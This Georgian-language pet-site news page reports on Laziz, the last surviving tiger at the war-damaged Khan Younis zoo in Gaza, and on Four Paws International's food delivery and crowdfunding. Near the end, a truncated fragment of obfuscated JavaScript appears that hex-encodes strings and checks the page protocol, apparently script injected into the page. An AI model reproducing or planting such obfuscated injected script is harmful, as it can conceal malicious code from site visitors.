ვეფხვი ხედავდა, თუ როგორ იღუპებოდნენ მიტოვებულ ზოოპარკში სხვა ვეფხვები შიმშილით
ვეფხვი ხედავდა, თუ როგორ იღუპებოდნენ მიტოვებულ ზოოპარკში სხვა ვეფხვები შიმშილით
ხანე იუნისეს ზოოპარკში, ქალაქში, რომელიც ღაზას სექტორში ომმა დააზარალა, ერთი ვეფხვი დარჩა. მას ლაზიზი ჰქვია.

ის რამოდენიმე კვირის მანძილზე ხედავდა, თუ როგორ იღუპებოდნენ სხვა ვეფხვები შიმშილით.

ამ სიტუაციაში მაშველები ჩაერივნენ. ლაზიზი ზოოპარკში მარტო არ იყო. იქ იყვნენ ლეოპარდები, მელიები, მაიმუნები და ფრინველები, რომლებიც ასევე სასწრაფოდ საჭიროებდნენ დახმარებას.

Zooclub

ორგანიზაცია Four Paws International-მა სასწრაფო ორგანიზება გაუკეთა საკვების გადატანას იორდანიიდან, რომელიც ბედის ანაბარად მიტოვებულ 40 ცხოველს დაღუპვისგან გადაარჩენს.

Zooclub

“ზოოპარკში სიტუაცია ჩვენი ბოლო ვიზიტის შემდეგ (2015 წლის აპრილი) მკვეთრად გაუარესდა, - ამბობს ექიმი ამირ
ხალილი, - 2015 წლის ზაფხულში აქ კატისებრთა ოჯახის 40 წარმომადგენელი ბინადრობდა. ამჟამად მათგან მხოლოდ თხუთმეტია
დარჩენილი.”

Zooclub

ცუდი ამინდისა და ამ სექტორში დაუსრულებელი კონფლიქტის გამო, ხან იუნისის ზოოპარკი დამთვალიერებლების, მაშასადამე შემოსავლის წყაროს გარეშე დარჩა.

Zooclub

უკვე მერამდენედ მოხვდნენ ცხოველები ასეთ საშინელ სიტუაციაში. მისი გახსნის შემდეგ (2007 წ.) ცხოველები ხშირად რჩებოდნენ საკვების გარეშე.

Zooclub

რეგიონში არასტაბილურობის გამო, რამოდენიმე კვირის მანძილზე ზოოპარკი არაერთხელ რჩებოდა დამთვალიერებლების გარეშე.

მიუხედავად იმისა, რომ რაიონი არ არის დიდი, იქ 6 ზოოპარკია განლაგებული.

Zooclub

Four Paws International ქრაუდფანდინგის პლატფორმას იყენებს იმისათვის, რომ გაჭირვებაში მყოფი ცხოველებისთვის საჭმლისა და მკურნალობის ფული შეაგროვოს - მსოფლიოს ცხოველთა მოყვარულების დახმარებით, მათ უკვე 12 000 დოლარი შეაგროვეს.


ორგანიზაციის გვერდი: Four Paws International
ორგანიზაციის ფეისბუქი: Four Paws International - Facebook
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o {var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
კომენტარი ჯერ არ გაკეთებულა
დახმარება
  • რა ვაჭამოთ?
  • ჯიშები
  • სად ვიყიდოთ?
გამოკითხვა
რომელი ბრენდის საკვებს აჭმევთ თქვენს ძაღლს?